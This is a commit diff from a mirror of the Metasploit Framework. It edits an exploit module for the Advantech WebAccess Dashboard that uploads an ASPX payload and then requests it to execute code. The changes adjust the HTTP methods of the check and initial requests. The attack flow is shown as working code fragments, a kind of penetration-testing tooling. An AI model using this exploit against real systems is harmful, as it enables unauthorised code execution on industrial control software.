infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update advantech_webaccess_dashboard_file_upload.rb

bug/bundler_fix
504137480 2016-04-17 21:15:03 +08:00
parent 6c969b1c3b
commit ab9e988dd4
1 changed files with 5 additions and 5 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

10
modules/exploits/windows/scada/advantech_webaccess_dashboard_file_upload.rb
View File

@ -56,8 +56,8 @@ class MetasploitModule < Msf::Exploit::Remote
def check def check
res = send_request_cgi({ res = send_request_cgi({
'method' => 'POST', 'method' => 'GET',
'uri' => normalize_uri('WADashboard','ajax','UploadAjaxAction.aspx?AspxAutoDetectCookieSupport=1'), 'uri' => normalize_uri('WADashboard','ajax','UploadAjaxAction.aspx'),
'cookie' => 'AspxAutoDetectCookieSupport=1' 'cookie' => 'AspxAutoDetectCookieSupport=1'
}) })
@ -74,8 +74,8 @@ class MetasploitModule < Msf::Exploit::Remote
def exploit def exploit
res = send_request_cgi({ res = send_request_cgi({
'method' => 'POST', 'method' => 'GET',
'uri' => normalize_uri('WADashboard','ajax','UploadAjaxAction.aspx?AspxAutoDetectCookieSupport=1'), 'uri' => normalize_uri('WADashboard','ajax','UploadAjaxAction.aspx'),
'cookie' => 'AspxAutoDetectCookieSupport=1' 'cookie' => 'AspxAutoDetectCookieSupport=1'
}) })
unless res && res.code == 200 unless res && res.code == 200
@ -90,7 +90,6 @@ class MetasploitModule < Msf::Exploit::Remote
data.add_part('uploadFile', nil, nil, 'form-data; name="actionName"') data.add_part('uploadFile', nil, nil, 'form-data; name="actionName"')
data.add_part(aspx, nil, nil, "form-data; name=\"file\"; filename=\"#{file_name}\"") data.add_part(aspx, nil, nil, "form-data; name=\"file\"; filename=\"#{file_name}\"")
res = send_request_cgi({ res = send_request_cgi({
'method' => 'POST', 'method' => 'POST',
'uri' => normalize_uri('WADashboard','ajax','UploadAjaxAction.aspx'), 'uri' => normalize_uri('WADashboard','ajax','UploadAjaxAction.aspx'),
@ -105,6 +104,7 @@ class MetasploitModule < Msf::Exploit::Remote
fail_with(Failure::UnexpectedReply, "#{peer} - Payload uploaded failed") fail_with(Failure::UnexpectedReply, "#{peer} - Payload uploaded failed")
end end
print_status("#{peer} - Executing payload...") print_status("#{peer} - Executing payload...")
res = send_request_cgi({ res = send_request_cgi({
'method' => 'GET', 'method' => 'GET',
'uri' => normalize_uri('WADashboard',file_name), 'uri' => normalize_uri('WADashboard',file_name),